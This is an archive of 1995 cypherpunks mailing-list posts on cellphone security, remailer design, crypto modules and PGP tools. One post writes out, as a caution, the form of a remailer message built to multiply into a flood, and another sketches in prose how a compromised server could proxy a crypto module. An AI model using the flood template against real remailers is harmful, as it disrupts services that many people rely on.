MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Jan 1995, Arsen Ray Arachelian wrote:

> Oh brother, here we go again.  Now the bandits are not only going to listen in
> for the serial numbers of the phone, but they'll listen in for (what?) touch
> tones of the block out numbers passwords?

The celluar companies "solution" to this problem for AMPS phones is 
laughable.

> If only these guys would wake up and use strong crypto...  This is a perfect
> example of a government caused fucked up on a grand scale due to the fact that
> we now have an installed base of millions of insecure cell phones and cell
> stations.   It's probably not too late for the cell companies to start
> introducing crypto cell phones, but the longer they wait, the harder the switch,
> and what's worse is that they've taken the attitude that "So what if we loose
> millions, we'll just raise the prices and get it all back anyway."

My understanding is CDMA based digital celluar go a long way toward 
this.  CDMA uses direct-sequence spread-spectrum based transmission, 
should keep everyone but the TLA's out.

> You certainly won't find me sporting a cell phone until we get something a bit
> more secure.  :-I  At least the beeper black market isn't as vicious...

Consider getting digital celluar service.  The current widely deployed 
digital celluar standard, TDMA, is less secure than CDMA above, but is 
more than enough to keep 99% of the cell bandits out.  CDMA should be 
available from USwest and Pacific Telesis (possibly others) by the end 
of the year.

-- 
Christopher E Stefan  *  flatline@u.washington.edu  *  PGP 2.6ui key by request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@earthlink.net (John L. Tocher)
Date: Tue, 31 Jan 95 19:24:05 PST
To: cypherpunks@toad.com
Subject: Z-Mail by Web
Message-ID: <m0rZVbv-000LFwC@moon.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


>>     Can someone please email me with details about obtaining and 
>>     configuring Z-Mail for use with PGP?
>>     Thanks,
>>     John
>>     
>I would be interested also.  How about cc  this list...
                                        ...  __o
>                                       ..   -\<,
>Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).     

Z-Mail info available at:
ftp://ftp.netcom.com/pub/be/berliner/readme.html 
http://www.kaiwan.com/~mckinnon/readme.html 

I called the company to get a demo key (unlocks the software for a trial
period of 30 days),
and inquired of the price. It's $165 for a single user license... ouch!
I'll check it out, but can anybody suggest alternative windoze/PPP/PGP
interfaces?
John


-
John Tocher                   THE CITY-a bounded infinity.   A labyrinth where
JLTocher@Earthlink.net        you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Tue, 31 Jan 95 20:39:32 PST
To: cypherpunks@toad.com
Subject: Re: DON'T READ!--I'm leaving for Monte Carlo just in time
In-Reply-To: <199501302031.MAA16023@netcom6.netcom.com>
Message-ID: <fVjBlKJXY1hE078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <199501302031.MAA16023@netcom6.netcom.com>,
tcmay@netcom.com (Timothy C. May) wrote:
> Actually, I'm lying. I'm leaving for Monte Carlo in a few hours, to
> give the paper I distributed earlier. (And I'm carrying half a dozen
> DATs, each capable of holding several gigabytes of data, or hundreds
> of megabytes in Stego-LSB mode. And an optical disk cartridge (holding
> only a measly 128 MB). I'll let you know if French customs raises an
> eyebrow upon my entry to Paris--I doubt it--or if the U.S. Federales
> take note of me upon my (attempted?) return to the land of the free.)

Let us know when/where you're returning and will call Customs with
an 'anonymous' tip about a crypto-anarchist returning from a meeting
with the cabal.  Monte Carlo IS the puppet state of a nominally
Socialist government, right?  As James Coburn's character said in
_Hudson Hawk_, "God, I miss the Commies!".

- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy7ZAGvyi8p8VUiJAQGg7QQAxWRhk+Ple1UK18CbysKv9OrioxRvMJbb
JPL02KW/3XXVjdcTxg4ze6qsPON9DIK585ArgjlxQ8jPOFH00mAD07vFbo7LU0f8
erLgSb8nhZ9UwOhAFbZ5m5dP4dR99VbVe/jX8rxEyPwGNMf6p51WqsCXW85AP1J7
L9VKWWVY1qA=
=Hl8A
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 31 Jan 95 16:39:37 PST
To: Robert Rothenberg <cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <ab54891b070210044757@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:55 PM 01/31/95, Robert Rothenberg wrote:
>Without quoting the entire message, I think I better solution, in terms of
>ease to implement as well as conserving bandwidth would be to have a
>sophisticated remailer script-language.

Yeah, this is really an excellent idea, that I don't see happening any time
soon. Although of course if anyone wants to write code for such a beast,
that would be really excellent.  If someone gets around to writing it,
it'll happen, but it would be a fairly big project, so I wouldn't hold my
break.  Safe TCL, anyone?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Tue, 31 Jan 95 20:40:14 PST
To: cypherpunks@toad.com
Subject: Re: Where is the Line Between Public and Private Data?
In-Reply-To: <9501302100.AA05636@TeleCheck.com>
Message-ID: <ubjBlKJXYjuF078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <9501302100.AA05636@TeleCheck.com>,
Joe Turner <turner@telecheck.com> wrote:
> 
> The U.S. Postal Service is selling the NCOA (National Change of Address)
> data to credit card companies.  Some junk-mailing lists are also 
> produced.

Minor point: the NCOA data is only available if you have the previous
address.  Mailers submit a list of name/addresses to an NCOA contractor
(severly limited in what they can do) and if there is a match with the
address supplied by the mailer, the address is updated.  You cannot
just call them up and buy mailing lists.

- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy7aP2vyi8p8VUiJAQHcdwQA0nq8oxSuwOGtTxw5McuYv+y8AxWIzRN0
BjRadDR3FOLKSbwRWFkyCy615lgcoDKEAA4POUKrq6s46ugOmQPR4OZTwDR859nR
ifXzzRDM+HhsFbpEtS/HxYou0ZC0BUtAfuzjdVhtAkuk+RSrEcx1udLno1RonVff
2VuaDEuRmNU=
=txUl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Tue, 31 Jan 95 12:14:41 PST
To: cypherpunks@toad.com
Subject: the moderation principle
Message-ID: <199501312014.UAA02292@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain




    From: alt@iquest.net (Al Thompson)

    If strong government resulted in liberty and freedom, then the
    most intrusive, all-encompassing governments would result in
    its citizens having the most liberty.  Is this the case?  I would
    look at the (former) Soviet Union, Iran, Cuba, East Germany, etc.,
    for your answer.


In all things, moderation. If I like salt on my steak, that does not mean
the most salt is the best.

Thinking in fundmentalist extremes severely limits your room for creative
problem solving.

You don't do that when you discuss cypers -- you don't take rigid sides of
"subway" vs "mixmaster", and paint the other side as fools becauase their
system would be silly if taken to its extremes. You learn from one another.

Be as creative about political possibilities.



-rkm
                      _____________________
                         Richard K Moore
                         > cyber scribe <
             citizenships:   USA   ;    cyberspace
                    homes: Ireland ; <rkmoore@iol.ie>
                      _____________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 31 Jan 95 20:12:54 PST
To: cypherpunks@toad.com
Subject: Re:  remailers and multiple recipients
Message-ID: <199502010412.UAA19934@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
> Can the remailers handle multiple recipients?  If I list several addresses
> in the "Request-Remailing-To:" line, seperated by commas, will the remailer
> do what I would think, and send off to all of them?

We had some concerns here a while back that someone was trying to exploit
such a feature to create an exponentially-growing message that would
totally overload the remailers.  A message of the form:

::
Request-Remailing-To: <list of remailers here>

::
Request-Remailing-To: <list of remailers here>

<repeat about 20 times>

was sent.  If all remailers had observed and honored the multiple
requests, there would have been uncounted trillions of messages flying
about.  So I would caution anyone considering implementing this feature.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 31 Jan 95 20:53:20 PST
To: cypherpunks@toad.com
Subject: Re:  Frothing remailers - an immodest proposal
Message-ID: <199502010434.UAA26114@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have some concerns about Kevin's frothing remailers.  Like so many of
the proposals we see to put more responsibility into the remailer net,
this opens vulnerability to a single bad remailer.  If I trust the first
remailer in the net to choose my path for me, as I might be tempted to
do with a froth, then if that remailer is corrupt my anonymity is lost.
With user-supplied chaining I am secure unless all of the remailers on
the chain are corrupt.

I also do not like the kind of close-knit, cozy cooperation among the
guild of remailer operators which seems to be envisioned in this and
similar proposals.  Do you like the idea of messages on the remailer
operators list saying, I am getting objectionable messages from your
remailer, would you mind dropping in a log so we can see who is sending
these messages which violate the Politically Correct Speech Act?

I do like Kevin's ideas about a dynamic remailer net, but I think
another approach would put more smarts into the client program used by
the originator.  Granted, his information will be somewhat more out of
date as the message makes its way through the network.  But depending
on thie time scale at which the froth, um, froths, this should still
allow a lot more dynamism among the set of remailers.  Using either IRC
or, as Todd suggested, Usenet to maintain an active remailer list might
work.  We could also have a distributed set of sites which provide the
information by finger like the pinging sites we have now.

A few notes about Safe-TCL.  I posted some ideas on using this as a basis
for remailing some time back.  Safe-TCL defines three times at which
messages could be activated (scripts in them run).  One is on message
sending, one on message reading (so it can put up dialog boxes and
interact with the recipient in other ways), and the third on receipt,
which is when it enters the user's mailbox.  The actual safe-tcl
implementation does not include support for this third mode, but it would
be pretty easy to add.  If you had that, messages could come to your
machine and activate to do various things that you allow them to do.  If
you allowed them to send mail as one of those things, this would be a
start towards a remailer.

What you need then is some way for various messages to interact with each
other, so that, for examle, a message could wait until there were a
certain number of other messages inside the machine before it sent itself
out.  You would also want a way for a message to suspend itself until
some future event, such as having a certain amount of time passing, or
waiting until some message with desired properties arrived.

There has been intermittent discussion of similar topics on the safe-tcl
mailing list.  The motivation there is not supplying remailers, of
course; rather there is a desire to have something with similar
functionality to the much-ballyhooed Telescript, but less bound by
proprietary constraints.  Telescript scripts can move through the network
and interact with other scripts (at least, they will supposedly be able
to, but the exact manner is apparently secret for now).  Providing the
simple act of motion to mail agent scripts without stamping them with a
record of everywhere they have been is really all a remailer would do.
(I wonder if Telescript agents have to carry around with them a record of
every path they've taken?)

Sending a message through a safe-tcl based remail network might be more
cumbersome than our current techniques.  You might have to precede the
message body with a safe-tcl program a few lines to a couple of pages in
size depending on the complexity of remailing you want.  But again with
proper clients this can be hidden from the user.  I think emphasis should
be on smart mailer clients rather than more cooperation among nodes in
the remailer network.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLy8O8hnMLJtOy9MBAQHMjwIA40ZIvNtOvMN/mWtY4bSN0MYMravR9bNr
zhZ519K+g6w5ZsW71c/kM7BFz15BjB9pIcTMjUQv/C8YJNGrdFEzhg==
=1okU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 31 Jan 95 18:07:20 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: AT&T and VLSI Encryption device
In-Reply-To: <Pine.SUN.3.91.950131175217.26397L-100000@eskimo.com>
Message-ID: <9502010206.AA25940@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Charles Bell says:
> On Tue, 31 Jan 1995, Perry E. Metzger wrote:
> > The manufacturers of switching equipment are supposed to make it easy
> > to get at individual conversations. Nothing in the act forces
> > customers to make the contents of the conversations comprehensable.
>
> That's a loophole in the law that Congress can plug in a day.  And one of 
> these days you can bet they will.
> 
> What then?

Then the law will be different. The question was one of what the law
is now.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 31 Jan 95 21:21:38 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
In-Reply-To: <199502010253.VAA03904@bb.hks.net>
Message-ID: <199502010520.VAA04884@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   In article <9501312152.AA10208@toad.com>,  <kevin@elvis.wicat.com> wrote:
   >It seems to me that the current remailer web suffers a fundamental flaw.
   >It is simply too static.

It is worthwhile remembering that a remailer network has two
characteristics of service: the fact of delivery, and silence in the
internal facts of that delivery.  That is, you want your email to get
there, but you don't want anybody else to know how it got there.
There are correspondingly two trusts in the function of a remailer,
namely, a trust in reliability, and a trust in silence.

It is very important to remember that only one of these is externally
verifiable.  Your mail gets to its final location; you can tell that.
What you can't tell (external to the remailer) is whether the remailer
kept a copy of the mapping between input and output messages.

Now, dynamic rerouting is good for better delivery, but is bad for the
trust in silence.  Trust in externally unverifiable properties is
_not_ transferrable.  Just because I believe that my regular remailer
is OK does not mean you do.  The creation of these links of trust is
not something that can be automated solely by the remailer operators.
The end users of the remailers are the endpoints of this trust
relationship.  The end users must be involved, either directly or
through some (legal) agent, in the manipulation of these relationships.

Any solution which tries to do this independent of the end user is
broken, by definition.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 31 Jan 95 21:29:07 PST
To: cypherpunks@toad.com
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501301802.AA08512@merckx.info.att.com>
Message-ID: <199502010527.VAA04897@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Matt Blaze <mab@research.att.com>

   [this = storing secrets]
   At the extreme, fixing this is a Hard Problem.  In practice for establishing
   a reasonably secure session, it all depends on how much you worry about a
   full-blown (two way) spoofing attack against IP.

I know Matt realizes, but let me repeat for the rest of the list.

Just because plain old Diffie Hellman is subject to active attack
doesn't mean it's useless.  Some protection is better than no
protection at all.  It's still worthwhile implementing some security
to make an opponent's task harder than to implement no security.

And just because some people find this level of security inadequate
does not mean that everyone else does.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <remail@desert.xs4all.nl>
Date: Wed, 1 Feb 95 19:08:30 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199502020308.AA13869@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


##
Subject: Re: Frothing remailers - an immodest proposal
In-reply-to: <199502010520.VAA04884@largo.remailer.net> (eric@remailer.net)

> Date: Tue, 31 Jan 1995 21:20:28 -0800
> From: eric@remailer.net (Eric Hughes)
> 
>    In article <9501312152.AA10208@toad.com>,  <kevin@elvis.wicat.com> wrote:
>    >It seems to me that the current remailer web suffers a fundamental flaw.
>    >It is simply too static.
> 
> Now, dynamic rerouting is good for better delivery, but is bad for the
> trust in silence. [...] The end users must be involved, either directly or
> through some (legal) agent, in the manipulation of these relationships.
> 
> Any solution which tries to do this independent of the end user is
> broken, by definition.
> 
> Eric

  Well, pgp support multiple recipients of messages.  Supose that the
remailers would choose at random only one of the addresses the user
(or their client program) requested in a header line like:

Request-ND-Remailing-To: RM1@a.b.c, RM2@c.d.e, RM3@e.f.g

and try to deliver.  If the mail fails right away, then it tries
another address.  Etc.

  The very paranoid user would avoid this feature, and stick with the
old fashioned system.  The paranoid would list two remailers, and
encrypt the folowing message to both of them, and probably add a few
more levels to the chain, just to be sure.  The compleatly trusting
would only have two levels of remailing, but which listed every
remailer as a posible recipient of the message they send to the first
in the chain.

  In this way we get better reliability, but still have user control
over selecting the remailers.  In fact, the user can select arbitrary
message reliability, and remailer trust parameters, and should be able
to come up with a set of nd-hops to meet the parameters.

  Hey Wei, Hal: What is the cost of this in terms of likelyhood that
the whole path of remailers actually selected is compromised?  Is this
about right?  If 50% of the remailers are run by the enemy, then with
only one remailer listed in each hop, the odds of the path being
compromised is (.5)^h (where h is number of hops).  The odds of
successfull delivery are .90^h (asuming every remailer is 90% up).  If
at each step there were two remailers, and the evil remailers always
selected other co-operating evil remailers, then the odds of the path
being compromized is larger at ((1-.5^2)==.75)^(h).  But the odds of
sucessfull delivery are much better, (1-((1-.90)^2)==.99)^(h).  To
keep the same chance of the path being compromised, the user would
need to have 'x' times more hops where x is such that (.75)^x == .5,
or about 2.4 times as many.

  Hmmm...

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Tue, 31 Jan 95 19:56:07 PST
To: cypherpunks@toad.com
Subject: VoicePGP cracked in 10 minutes?...
Message-ID: <199502010348.VAA00506@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Hi all,

I heard a rumor hear in Ctl. Tx. that the VoicePGP project was cracked in the
last couple of days in approx. 10 minutes. Anyone have any info on this other
than one of those wild rumors that occur?

Thanks and take care.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Tue, 31 Jan 95 18:57:30 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <199502010253.VAA03904@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <9501312152.AA10208@toad.com>,  <kevin@elvis.wicat.com> wrote:
>It seems to me that the current remailer web suffers a fundamental flaw.
>It is simply too static.

Agreed, of course.

I also don't really want to quote your entire article but want to throw
some points into the discussion.  In general, I think you've got a good
approach but might be a little too tied to instant-gratification use of
IP.

I touched on some of this a while ago, in the thread "Broadcast and the
rendezvous problem," and have thought about it a bit more after getting
others' comments:

1.  Broadcasting every couple of minutes isn't necessary and is undesirable
due to the real limitations of the Internet.  A remailer could broadcast
its location with a time-out on the location without a constant stream
of availability announcements.  In your position for example, you'd
broadcast a message at 5 pm with a 16 hour valid time.

2.  This is actually unnecessary for your situation: All you need to do is
advertise your location as a "real" remailer and then have a cron job that
kill sendmail at 5pm on your remailer machine (assuming you have a spare
machine that doesn't need to run sendmail).  The mail network is flexible
enough that things will Just Work.  Mail won't go through instantly during
the day, of course, but that just helps to muddy up the mix.

3.  Broadcasting over live IP isn't all that great a model.  Ideally,
you'll use a mechanism that doesn't require instant communication among
hosts.  I favor USENET for this: messages have a naturally long life-
time and the network is self-adjusting.  If a direct route is temporarily
unavailable, an indirect one will often manifest itself.  I also favor
using USENET store-and-forward for the messages themselves for the same
reasons: traffic analysis is impossible inside the web and direct routes
are not necessary.

4.  Using a PGP-style web-of-trust is important.  In the ideal situation,
one human in an extended web can certify individual remailers and all other
remailers close enough on the same web of trust would pick up the message
immediately.

Just some thoughts,
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy6+ThNhgovrPB7dAQHoDQP/UDn2GV7Jq8C3nQyN9IhvGMUTGnBjcL+k
zCPgTOLjANMrMN791VdeoNs9rR3QKFdFR9y0p39lka0p+9n1I3hDuEKyAX8Cicub
h0/eyr54bEzC6Q2L06VlIzDac9K7kILUkIf2ypgeXTrFuMSZITy+z0ugDeq3NA7B
W+gkl82hJZk=
=69b2
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLy73lyoZzwIn1bdtAQG/8wGA1kS3RyqBsxOZgniuxZqGySeybSJQuVp4
3zsxH545MqhBXmh16Gh4LvBlkre+9JYT
=Evbh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Tue, 31 Jan 95 19:07:06 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: Frothing remailers - an immodest proposal
In-Reply-To: <ab54891b070210044757@[132.162.201.201]>
Message-ID: <199502010306.WAA20250@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 6:55 PM 01/31/95, Robert Rothenberg wrote:
> >Without quoting the entire message, I think I better solution, in terms of
> >ease to implement as well as conserving bandwidth would be to have a
> >sophisticated remailer script-language.
> 
> Yeah, this is really an excellent idea, that I don't see happening any time
> soon. Although of course if anyone wants to write code for such a beast,
> that would be really excellent.  If someone gets around to writing it,
> it'll happen, but it would be a fairly big project, so I wouldn't hold my
> break.  Safe TCL, anyone?
> 
Hmmm... this could be combined with the "subway" remailer idea too. Have
a message format that can contain multiple destinations and a script lang
also can pick up and drop off messages, and messages can specify if they
are to be picked up or dropped off, etc.... endless possibilities...

I don't have the C/Unix skills to even attempt this though.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 31 Jan 95 22:08:49 PST
To: cypherpunks@toad.com
Subject: The security characteristics of crypto modules with secrets
In-Reply-To: <9501310546.AA09683@merckx.info.att.com>
Message-ID: <199502010607.WAA04942@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Matt Blaze <mab@research.att.com>

   I think better than expecting the world to switch over to
   cumbersome, multilevel secure OSs is to equip such servers with
   inexpensive tamper-resistant cryptographic modules that never reveal
   their secrets.

This is certainly the first step to take, even if it's not a complete
answer.

   At least then you're guaranteed that there can be only
   one instance of a machine's identity out there at a time, and have some
   hope of detecting the theft of the key material.  

Unfortunately, this isn't really true.

Let's take as our model general purpose computers which can't store
secrets connected directly to crypto modules which can.  Furthermore,
let us assume that these general purpose computer are subject to
intrusion.  In other words, it's today's servers with attached crypto.

Now, the crypto module can't authenticate the machine it's plugged
into, because, by definition, that machine can't keep a secret.  One
ends up in an infinite regress here in one tries to assume a secret in
the place we have assumed otherwise.  Because the crypto module can't
authenticate the machine, it will reply to service requests from both
the local and approved machine and any remote and unapproved machines
that can gain access to the module.  The software on the server can be
subverted in order to allow the local crypto module to service remote
requests.

The attack works like this.  First, subvert the system software on
some server, probably through existing implementation defects.  Now,
install new software on that server that allows other machines to make
remote procedure calls to the module.  Set up a client on an
impersonating machine that make remote calls to the subverted server
whenever it needs to spoof.  The remote calls will most likely be an
encrypted protocol, to boot.  The easiest way to detect this
externally will be an additional delay in response, that is, doable
but not particularly reliable.

This is not to say that crypto modules are useless.  They have a great
use in recovery.  Because the secret doesn't leave the module, you
have an assurance after recovery (reboot from CDROM, for example) that
nobody else has the secret.  There won't be a need for an immediate
key change, at least.  What you don't get is a complete loss of
assurance of identity.

The prevalent use of modules further reduces the likelihood of initial
attacks based on spoofing.  Since active IP attacks require the
subversion of routers, and since router software is much more
difficult to subvert than general purpose servers, adding crypto
modules to routers would be a big win.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 31 Jan 95 19:25:26 PST
To: cypherpunks@toad.com
Subject: remailers and multiple recipients
Message-ID: <ab54afd9060210046105@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


Can the remailers handle multiple recipients?  If I list several addresses
in the "Request-Remailing-To:" line, seperated by commas, will the remailer
do what I would think, and send off to all of them?

Anyone who knows the answer (either from experience, or because they run a
remailer, or wrote the software), please tell me. I've been trying
experimentally, unsuccesfully so far, but I'm not sure if that's just
because I'm using the wrong syntax, or the wrong remailers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Tue, 31 Jan 95 22:37:21 PST
To: mab@research.att.com (Matt Blaze)
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501312336.AA11049@merckx.info.att.com>
Message-ID: <m0rZYSI-0004IOC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> >Matt, why did you choose to implement your own protocol instead of
> >adding a DH authentication/encryption type to telnet?
> >
> >               Marc
> 
> I've got one of those, too (it won't be ready for release too soon, 
> though - telnet is big and ugly).  An encrypting telnet and telnetd
> almost always provide a more appropriate way to do session encryption.
> However, there are some situations where ESM is really the only
> option.  One is when you can't or don't want to install a daemon
> (e.g., for very occasional use).  More importantly, by running within
> the session, ESM can provide end-to-end encryption across an untrusted
> application-layer firewall (like the one I go through to get
> between home and work).

I might add that esm can be installed on unix boxes in your own account
without having to be root, something which cannot be said for telnetd.
Not everyone has root access to every box they are on, so implementing
one's own interface instead of having to rely on something that requires
root access on every machine makes a lot more sense.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Tue, 31 Jan 95 20:31:13 PST
To: root <root@einstein.ssz.com>
Subject: Re: VoicePGP cracked in 10 minutes?...
In-Reply-To: <199502010348.VAA00506@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950131232744.17881C-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995, root wrote:

> I heard a rumor hear in Ctl. Tx. that the VoicePGP project was cracked in the
> last couple of days in approx. 10 minutes. Anyone have any info on this other
> than one of those wild rumors that occur?

	Well, uh, yeah.

	VoicePGP hasn't been completed yet, much less released. If it's 
been cracked, that's very ... suprising.

	VoicePGP uses Diffie-Hellman and 3DES with three independent 
subkeys. If anyone has come up with an attack on D-H or 3DES that works 
in ten minutes, I'd love to hear about it, as I'm sure the rest of you would.

	Call Security was cracked by Don Coppersmith [if you don't know who 
he is, shame on you: he led the IBM Lucifer/DES team] about a day after the 
announcement on sci.crypt. Call Security != VoicePGP.

Michael
--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@telecheck.com>
Date: Tue, 31 Jan 95 21:32:51 PST
To: storm@marlin.ssnet.com
Subject: Re: DON'T READ!--I'm leaving for Monte Carlo just in time
In-Reply-To: <fVjBlKJXY1hE078yn@ssnet.com>
Message-ID: <9502010533.AA07005@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text


> In article <199501302031.MAA16023@netcom6.netcom.com>,
> tcmay@netcom.com (Timothy C. May) wrote:
> > Actually, I'm lying. I'm leaving for Monte Carlo in a few hours, to
> > give the paper I distributed earlier. (And I'm carrying half a dozen
> > DATs, each capable of holding several gigabytes of data, or hundreds
> > of megabytes in Stego-LSB mode. And an optical disk cartridge (holding
> > only a measly 128 MB). I'll let you know if French customs raises an
> > eyebrow upon my entry to Paris--I doubt it--or if the U.S. Federales
> > take note of me upon my (attempted?) return to the land of the free.)
> 
> Let us know when/where you're returning and will call Customs with
> an 'anonymous' tip about a crypto-anarchist returning from a meeting
> with the cabal.  Monte Carlo IS the puppet state of a nominally
> Socialist government, right?  As James Coburn's character said in
> _Hudson Hawk_, "God, I miss the Commies!".
> 
Or worse, you could always tell the customs agents that he is 
Zimmerman.  Then he is almost assured to get harrased. 

-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654	(800) 888-4922  *   (713) 439-6597
Finger for PGP KEY.  MicroSoft SNA Server SUCKS.. buy it at your own risk.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Tue, 31 Jan 95 20:35:51 PST
To: jamesd@netcom.com
Subject: Re: The RSA FAQ on http://www.catalog.com/jamesd/rsafaq.html
In-Reply-To: <199501310841.AAA25011@netcom4.netcom.com>
Message-ID: <Pine.SUN.3.91.950131233256.17881D-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995 jamesd@netcom.com wrote:

> Chris converted the RSA FAQ to html for easy reading.
> I have placed this faq on http://www.catalog.com/jamesd/rsafaq.html

	Um, the RSA FAQ has been available in HTML hypertext form on 
http://www.rsa.com for at least four months now. Thanks for the effort 
and all -- I just think it's a bit duplicated.

Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Tue, 31 Jan 95 23:37:36 PST
To: cypherpunks@toad.com
Subject: Re: How the cypherpunks nearly got me fired (long)
Message-ID: <v03001102ab54e8d6db82@[140.174.229.210]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:10 1/31/95, David Mandl wrote:

[really horrid story about true life at a corporate dinosaur deleted]

>I just thought
>you might enjoy this little story, and would want to keep it in mind if
>you're ever considering employment at Bear-Stearns.

Part of my job-interviewing procedure has become grilling a would-be
employer (or whoever is asking for a contractor) about their net
connections.  I've been very pleasantly surprized that most [techie] places
